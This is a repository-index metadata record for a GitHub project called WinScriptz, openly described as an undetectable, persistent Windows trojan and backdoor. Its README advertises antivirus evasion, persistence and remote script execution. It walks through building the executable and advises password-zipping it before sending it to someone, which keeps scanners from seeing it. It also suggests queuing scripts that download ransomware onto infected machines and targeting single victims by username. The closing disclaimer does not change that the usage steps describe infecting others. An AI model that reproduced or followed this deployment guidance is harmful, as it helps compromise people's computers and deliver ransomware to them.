{"id":25653222,"url":"https://github.com/orkkz/winscriptz","last_synced_at":"2025-02-23T19:33:42.732Z","repository":{"id":277897127,"uuid":"933850445","full_name":"orkkz/WinScriptz","owner":"orkkz","description":"An undetectable persistent windows trojan that is able to execute scripts on a remote computer.","archived":false,"fork":false,"pushed_at":"2025-02-16T20:37:31.000Z","size":0,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-16T21:27:06.274Z","etag":null,"topics":["backdoor","free","hacking","hacks","python","rat","script","trojan","undetectable","virus","windows","worm"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/orkkz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-16T20:33:05.000Z","updated_at":"2025-02-16T20:38:15.000Z","dependencies_parsed_at":"2025-02-16T21:37:08.333Z","dependency_job_id":null,"html_url":"https://github.com/orkkz/WinScriptz","commit_stats":null,"previous_names":["orkkz/winscriptz"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orkkz%2FWinScriptz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orkkz%2FWinScriptz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orkkz%2FWinScriptz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orkkz%2FWinScriptz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/orkkz","download_url":"https://codeload.github.com/orkkz/WinScriptz/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240368063,"owners_count":19790365,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","free","hacking","hacks","python","rat","script","trojan","undetectable","virus","windows","worm"],"created_at":"2025-02-23T19:31:32.237Z","updated_at":"2025-02-23T19:33:42.674Z","avatar_url":"https://github.com/orkkz.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/08ea1e26-1ce6-4917-9391-24f695058475\"/\u003e\n\u003c/p\u003e\n\u003cp align=\"center\"\u003e\u003cb style=\"font-size: 30px\"\u003eWinScriptz: An open-source Windows backdoor enabling remote script execution.\u003c/b\u003e\u003c/p\u003e\n\n## Features  \n- **Undetected Execution** – Uses evasion techniques to bypass antivirus detection.  \n- **Persistence** – Ensures continued access to the system even after a reboot.  \n- **Remote Execution** – Downloads and runs scripts from a centralized admin server.  \n- **Custom Scripts** – Supports pre-made and user-defined scripts for executing commands, disabling peripherals, and more.  \n\n\nWinScriptz works by connecting to an admin server, retrieving queued scripts, and executing them on the remote machine. You can manage and deploy scripts remotely using the `queue-scripts` tool.  \n\n**Note:** Ensure all required libraries are imported into `executor.py` before execution.  \n\n#                                           Installation\n\nInstall the python requirements\n\n```sh\npython -m pip install -r requirements.txt\n```\n\nStart the server\n\n```sh\npython app.py\n```\n\nNow, compile the file.\n\n```sh\npython compile.py\n```\n\n#                                           USAGE\n\nThe compiled executable can be found in the `dist` directory, I recommend zipping it with a password before sending it to someone.\n\nOnce someone has ran your executable you will start to see numerous requests made to your server, you can then run \n\n```sh\npython queue-scripts.py\n```\n\nTo queue scripts to the remote computers, you can create your own scripts that can perform numerous tasks such as downloading ransomware or disabling a Windows function.\n\n**Note**: The queue-scripts.py must be ran on the server computer to be able to queue scripts.\n\n**Helpful**: To queue scripts on a single computer you can put the script inside the following code block.\n\n```py\nimport os\nif 'JohnKennedy' == os.getlogin():\n  # Script code here\n```\n\n'JohnKennedy' is the name of the user, it can be found in the `replies` directory.\n\n\n#                                           DISCLAIMER\n\nThis software is intended **solely for ethical use** and should only be deployed on systems where you have **explicit authorization** from the owner. Unauthorized access, execution, or modification of remote systems without consent is **illegal** and may violate **cybercrime laws** in multiple jurisdictions.\n\nI am **NOT** responsible for any misuse, damage, or legal consequences arising from the use of this tool. **Use it at your own risk** and ensure you have the proper permissions before deploying it.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forkkz%2Fwinscriptz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Forkkz%2Fwinscriptz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forkkz%2Fwinscriptz/lists"}